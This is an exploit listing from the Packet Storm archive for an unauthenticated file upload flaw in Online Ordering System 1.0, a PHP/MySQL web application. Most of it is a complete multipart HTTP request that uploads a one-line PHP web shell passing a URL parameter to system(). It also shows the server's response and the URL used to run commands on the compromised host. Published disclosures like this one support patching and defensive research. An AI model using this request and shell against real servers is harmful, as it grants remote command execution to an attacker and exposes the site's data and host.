what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Online Ordering System 1.0 Shell Upload

Online Ordering System 1.0 Shell Upload
Posted Mar 4, 2021
Authored by Suraj Bhosale

Online Ordering System version 1.0 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | 343b1cdf0fec1f8ca4f1dd3b5f5f0be80b5f21a0c3dab2debd3e7d7fdf6291fa

Online Ordering System 1.0 Shell Upload

Change Mirror Download
# Exploit Title: Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution
# Date: 04/03/2021
# Exploit Author: Suraj Bhosale
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
# Version: 1.0
# Tested on Windows 10, XAMPP


Request:
========

POST /onlineordering/GPST/store/initiateorder.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0)
Gecko/20100101 Firefox/85.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------14955282031852449676680360880
Content-Length: 972
Origin: http://localhost
Connection: close
Referer: http://localhost/onlineordering/GPST/store/index.php
Cookie: PHPSESSID=0es23o87toitba1p1pdmq5i6ir
Upgrade-Insecure-Requests: 1

-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="transnum"

VAF-XAP
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="select1"

25
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="pname"

keychain
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="select2"

1
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="txtDisplay"

25
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="note"

test
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: application/octet-stream

<?php echo "Shell";system($_GET['cmd']); ?>
-----------------------------14955282031852449676680360880--

Response:
=========

HTTP/1.1 200 OK
Date: Thu, 04 Mar 2021 13:28:27 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27
X-Powered-By: PHP/7.3.27
Content-Length: 55
Connection: close
Content-Type: text/html; charset=UTF-8

<meta http-equiv="refresh" content="1; url=index.php">

# Uploaded Malicious File can be Found in :
onlineordering\GPST\store\design

# go to
http://localhost/onlineordering/GPST/store/design/shell.php?cmd=hostname
which will execute hostname command.
Login or Register to add favorites

File Archive:

July 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    52 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close